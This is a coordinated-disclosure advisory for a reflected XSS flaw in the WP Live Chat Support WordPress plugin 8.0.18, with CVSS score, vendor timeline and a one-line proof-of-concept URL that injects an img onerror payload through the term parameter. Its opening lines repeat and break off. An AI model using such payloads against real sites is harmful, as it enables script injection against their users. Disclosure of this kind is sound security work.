* Vulnerability: XSS
* Affected Software: [WP Live Chat
Support](https://wordpress.org/plugins/wp-live-chat-support/)
* Affected Version: 8.0.18
* P * Vulnerability: XSS
* Affected Software: [WP Live Chat
Support](https://wordpress.org/plugins/wp-live-chat-support/)
* Affected Version: 8.0.18
* Patched Version:
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/31/2018
* Vendor Fix: 11/01/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

##### CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

##### Overview

The WP Live Chat Support WordPress plugin is vulnerable to reflected XSS
as it echoes the term parameter without proper encoding.

##### Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=wplivechat-menu-gdpr-page&term='"><img+src%3Dx+onerror%3Dalert(1)>

##### Timeline

- 10/31/2018 Requested email address via contact form
- 10/31/2018 Vendor responds, advisory sent
- 11/01/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

##### Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wp-livechat-xss/

--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89